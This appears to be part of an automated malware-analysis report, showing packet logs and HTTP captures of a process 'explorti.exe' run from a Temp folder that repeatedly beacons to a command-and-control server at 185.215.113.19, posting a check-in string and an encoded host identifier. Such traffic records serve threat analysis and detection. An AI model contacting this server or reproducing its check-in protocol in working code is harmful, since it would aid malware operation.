Jul 27, 2024 04:50:51.028815031 CEST	49776	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.029232025 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.034826994 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:51.034921885 CEST	80	49776	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:51.035000086 CEST	49776	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.035098076 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.035098076 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.040322065 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:51.786101103 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:51.786190987 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.786725998 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:51.791594982 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.032802105 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.033278942 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.139388084 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.140165091 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.151675940 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.152249098 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.152342081 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.161680937 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.183989048 CEST	80	49777	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.187843084 CEST	49777	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.923271894 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:52.923393965 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.927042007 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:52.931999922 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:53.174309015 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:53.174422026 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.278912067 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.279314995 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.284276009 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:53.284339905 CEST	80	49778	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:53.284435987 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.284523964 CEST	49778	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.284689903 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:53.289551973 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.031687021 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.031793118 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.032618999 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.037466049 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.279365063 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.279454947 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.388753891 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.389170885 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.394314051 CEST	80	49779	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.394354105 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:54.394414902 CEST	49779	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.394467115 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.394608974 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:54.399478912 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.173336983 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.173474073 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.174128056 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.180535078 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.422528028 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.422620058 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.529059887 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.529356956 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.536075115 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.536154985 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.536279917 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.536684036 CEST	80	49780	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:55.536751986 CEST	49780	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:55.544580936 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.316363096 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.316556931 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.318182945 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.323144913 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.564385891 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.564460039 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.669787884 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.670280933 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.675282001 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.675345898 CEST	80	49781	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:56.675558090 CEST	49781	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.675559044 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.675740957 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:56.680608034 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.412817955 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.412889004 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.413593054 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.419080019 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.658926010 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.659023046 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.779285908 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.779813051 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.784862041 CEST	80	49782	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.784953117 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:57.784971952 CEST	49782	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.785027027 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.785224915 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:57.790047884 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.550549984 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.550625086 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.551523924 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.556845903 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.833211899 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.839039087 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.950781107 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.951184034 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.956171989 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.956259966 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.956331015 CEST	80	49783	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:58.956362963 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.956501007 CEST	49783	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:58.961234093 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:59.702533960 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:59.702749968 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:59.703680038 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:50:59.708884954 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:59.963933945 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:50:59.964179993 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.076689005 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.080338001 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.082561016 CEST	80	49784	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:00.082772017 CEST	49784	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.085200071 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:00.085330963 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.087898970 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.093143940 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:00.823472977 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:00.823673964 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.824618101 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:00.830851078 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.113168955 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.113497972 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.216706038 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.216795921 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.222532034 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.222577095 CEST	80	49785	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.222661018 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.222661018 CEST	49785	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.222973108 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:01.227941990 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.997522116 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:01.997594118 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.000643969 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.006014109 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:02.255573034 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:02.259546995 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.373801947 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.374279022 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.379821062 CEST	80	49786	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:02.379865885 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:02.379925013 CEST	49786	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.379966021 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.380160093 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:02.385080099 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.239882946 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.240273952 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.286530018 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.291939974 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.552603960 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.552927017 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.706657887 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.709820986 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.712609053 CEST	80	49787	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.712728977 CEST	49787	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.714961052 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:03.715020895 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.718384027 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:03.723423004 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:04.490556002 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:04.490757942 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.493735075 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.494215012 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.499422073 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:04.499460936 CEST	80	49788	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:04.499537945 CEST	49788	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.499562979 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.499986887 CEST	49789	80	192.168.2.4	185.215.113.19
Jul 27, 2024 04:51:04.505219936 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:05.249130964 CEST	80	49789	185.215.113.19	192.168.2.4
Jul 27, 2024 04:51:05.249217987 CEST	49789	80	192.168.2.4	185.215.113.19

HTTP Request Dependency Graph

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49737	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:03.424983025 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:04.435867071 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:04.437208891 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:04.438379049 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:04.690713882 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:04.800107956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:05.535300016 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:05.536300898 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:05.780839920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:05.911653042 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:06.678591013 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:06.679553032 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:07.275886059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49740	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:07.394228935 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:08.162256956 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:08.163115978 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:09.382258892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 27, 2024 04:50:09.382395983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 27, 2024 04:50:09.382431030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49741	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:09.503314972 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:10.278546095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:10.279540062 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:10.531975985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49742	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:10.678642035 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:11.412758112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
